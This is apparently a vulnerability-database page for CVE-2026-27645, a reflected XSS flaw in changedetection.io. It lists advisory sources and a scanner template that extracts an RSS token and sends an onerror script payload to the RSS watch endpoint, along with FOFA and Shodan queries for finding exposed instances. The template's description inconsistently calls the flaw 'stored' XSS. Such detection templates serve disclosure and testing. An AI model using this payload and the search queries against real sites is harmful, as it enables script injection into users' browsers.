| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2026-27645 | 25 Feb 202604:06 | – | attackerkb | |
| CVE-2026-27645 | 23 Feb 202620:40 | – | circl | |
| changedetection.io 安全漏洞 | 25 Feb 202600:00 | – | cnnvd | |
| CVE-2026-27645 | 25 Feb 202604:06 | – | cve | |
| CVE-2026-27645 changedetection.io Vulnerable to Reflected XSS in RSS Single Watch Error Response | 25 Feb 202604:06 | – | cvelist | |
| EUVD-2026-8621 | 25 Feb 202619:07 | – | euvd | |
| changedetection.io Vulnerable to Reflected XSS in RSS Single Watch Error Response | 25 Feb 202619:07 | – | github | |
| CVE-2026-27645 | 25 Feb 202605:17 | – | nvd | |
| CVE-2026-27645 changedetection.io Vulnerable to Reflected XSS in RSS Single Watch Error Response | 25 Feb 202604:06 | – | osv | |
| GHSA-MW8M-398G-H89W changedetection.io Vulnerable to Reflected XSS in RSS Single Watch Error Response | 25 Feb 202619:07 | – | osv |
id: CVE-2026-27645
info:
name: Changedetection.io RSS Single Watch - Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: |
changedetection.io < 0.54.1 contains a stored XSS caused by unescaped reflection of UUID path parameter in RSS single-watch endpoint, letting remote attackers execute JavaScript in victim's browser, exploit requires victim to visit crafted URL.
impact: |
Attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks
remediation: |
Update to version 0.54.1 or later.
reference:
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-mw8m-398g-h89w
- https://github.com/dgtlmoon/changedetection.io/commit/a385c89abf44b52fcfa20c7c6a6dd3047c4c1eb5
- https://nvd.nist.gov/vuln/detail/CVE-2026-27645
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2026-27645
cwe-id: CWE-79
epss-score: 0.00445
epss-percentile: 0.35714
metadata:
max-request: 2
verified: true
fofa-query: title="Change Detection"
shodan-query: http.title:"Change Detection"
tags: cve,cve2026,xss,changedetection,rss
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "rss?token=", "Change Detection")'
internal: true
extractors:
- type: regex
name: rss_token
part: body
group: 1
regex:
- 'rss\?token=([a-f0-9]{16,64})'
internal: true
- method: GET
path:
- "{{BaseURL}}/rss/watch/%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E?token={{rss_token}}"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "Watch with UUID")'
condition: and
# digest: 4a0a0047304502200486cc763ba8fb628a0da7dd187334ca160ae7f96c11938ccfed80091810d32a022100b354bd4f128d7c40a6c03a6eaf88a9a3636172039b57048a47e4986d8876e5c6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation